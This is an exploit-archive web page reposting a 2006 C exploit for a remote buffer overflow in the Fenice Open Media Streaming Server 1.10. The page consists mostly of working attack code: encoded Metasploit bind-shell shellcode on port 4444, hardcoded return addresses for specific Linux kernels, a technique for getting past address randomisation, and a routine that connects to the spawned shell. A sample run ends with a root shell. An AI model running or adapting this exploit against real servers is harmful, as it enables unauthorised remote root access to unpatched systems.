首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit
来源:c0d3r@ihsteam.com 作者:c0d3r 发布时间:2006-04-26  

/*
IHS Iran Homeland Security public source code
Fenice - Open Media Streaming Server remote BOF exploit
author : c0d3r "kaveh razavi" c0d3r@ihsteam.com
package : fenice-1.10.tar.gz and prolly prior versions
workaround : update after patch release
advisory : http://www.securityfocus.com/bid/17678
company address : http://streaming.polito.it/server
timeline :
23 Apr 2006 : vulnerability reported by Luigi Auriemma
25 Sep 2006 : IHS exploit released
exploit features :
1) a global offset
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars : 0x00 0x05 encoder : PexAlphaNum
compiled with gcc under Linux : gcc fenice.c -o fenice

**************************************************************

Exploitation Method : linux-gate.so.1

the refrence written by izik could be downloaded from milw0rm.
after some research I realized that the offset is very stable
around 2.6 kernels compiled from source. the VA patch will
easily get bypassed. if you want to exploit 2.4 kernels
you can jump directly to the shellcode , there isn't any
stack randomization for sure in 2.4.* by default.
the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag
(slackware 10.2), also on 2.6.15.4 compiled with i386 flag
(Fedora core 2) was same. on default installation of fc3 the
linux-gate.so.1 has null at the first , so think of another
way to jump to the shellcode.

**************************************************************

greeting to :

www.ihsteam.com the team , LorD and NT
www.ihsteam.net english version ,
www.c0d3r.org my home :)
www.underground.ir friends who are participating in the forums
www.exploitdev.com Jamie and Ben , those times are now legend
www.milw0rm.com str0ke , keep the good job going

/*
/*

[c0d3r]$ gcc fenice.c -o fenice
[c0d3r]$ ./fenice 127.0.0.1 554 0

-------- fenice - Open Media Streaming Project remote BOF exploit
-------- copyrighted by c0d3r of IHS 2006

[+] Targeting slackware 10.2
[+] Shellcode size : 329 bytes
[+] Building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 750 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully to 127.0.0.1
[+] trying to get shell
[+] connecting to 127.0.0.1 on port 4444
[+] target exploited successfully
[+] Dropping into shell

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux


*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#define inc 0x41
#define size 750


void gotshell(int new_sock);
void usage();

// metasploit.com shellcode - badchars = 0x00 0x05
// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum
// I had a bit difficulty to execute my shellcode because some chars
// badly interpreted by fenice , anyway viva metasploit !

unsigned char shellcode[] =

"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59"
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff"
"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56"
"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58"
"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44"
"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d"
"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36"
"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49"
"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35"
"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45"
"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e"
"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e"
"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55"
"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b"
"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56"
"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55"
"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a";

char slack [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6
char FC2_2_6_15[] = "\x77\xe7\xff\xff"; // Fedora core 2 , 2.6.15.4
char debug [] = "\xdd\xdd\xdd\xdd"; // debugging purpose
char ret[4];
char get [] = "\x47\x45\x54\x20\x2f";
struct hostent *hp;
struct sockaddr_in con;
unsigned int rc,rc2,len=16,sock,sock2,os,addr,port;
char buffer[size];

// gotshell is from jamie (darkdud3) remote exploit sample
// with a bit change

void gotshell(int sock){

fd_set fd_read;
char buff[1024];
char cmd[100] = "id;uname -a\n";
int n;

FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
if((n=recv(sock,buff,sizeof(buff),0))<0){
fprintf(stderr, "EOF\n");
exit(2);
}
if(write(1,buff,n)<0)break;
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<0){
fprintf(stderr,"EOF\n");
exit(2);
}
if(send(sock,buff,n,0)<0) break;
}
usleep(10);
}
fprintf(stderr,"Connection aborted, select failed()\n");
exit(0);
}

void usage(char *arg){
printf("-------- usage : %s host_or_ip port target\n",arg);
printf("-------- example : %s localhost 554 0\n",arg);
printf("-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\n");
printf("-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\n");
printf("-------- target 2 : debug : 2\n\n");
exit(-1) ;
}

int main(int argc,char **argv){

printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n");
printf("-------- copyrighted by c0d3r of IHS 2006\n\n");
if(argc != 4)
usage(argv[0]);
os = (unsigned short)atoi(argv[3]);
switch(os){
case 0:
strcat(ret,slack);
printf("[+] Targeting slackware 10.2\n");
break;
case 1:
strcat(ret,FC2_2_6_15);
printf("[+] Targeting fedora core 2 \n");
break;
case 2:
strcat(ret,debug);
printf("[+] Debugging\n");
break;
default:
printf("\n[-] This target doesnt exist in the list\n\n");

exit(-1);
}
printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1);
printf("[+] Building overflow string\n");

// heart of exploit

memset(buffer,inc,size);
memcpy(buffer,get,5);
memcpy(buffer+5+361,ret,4);
memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;

// EO heart of exploit

hp = gethostbyname(argv[1]);
if (!hp)
addr = inet_addr(argv[1]);
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(con.sin_addr),hp->h_addr,hp->h_length);
else
con.sin_addr.s_addr = addr;
if (hp)
con.sin_family = hp->h_addrtype;
else
con.sin_family = AF_INET;
port=atoi(argv[2]);
con.sin_port=htons(port);
printf("[+] attacking host %s\n" , argv[1]) ;
sleep(1);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
if(!rc){
sleep(1) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
send(sock,buffer,strlen(buffer),0);
send(sock,"\n",1,0);
sleep(1) ;
send(sock,"\n",1,0);
sleep(1) ;
printf("[+] exploit sent successfully to %s \n" , argv[1]);
printf("[+] trying to get shell\n");
printf("[+] connecting to %s on port 4444\n",argv[1]);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
con.sin_family = AF_INET;
con.sin_port=htons(4444);
rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in));
if(rc2 != 0) {
printf("[-] exploit probably failed\n");
exit(-1);
}
if(!rc2){
printf("[+] target exploited successfully\n");
printf("[+] Dropping into shell\n\n");
gotshell(sock);
}
}
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox <= 1.5.0.2
·OCE 3121/3122 Printer (parser.
·FlexBB <= 0.5.5 (function/s
·Oracle <= 10g Release 2 (DB
·Apple Mac OS X Safari <= 2.
·Invision Power Board <= 2.1
·My Gaming Ladder Combo System
·BL4 SMTP Server < 0.1.5 Rem
·PHPSurveyor <= 0.995 (surve
·TopList <= 1.3.8 (phpBB Hac
·PCPIN Chat <= 5.0.4 (login/
·Advanced GuestBook <= 2.4.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved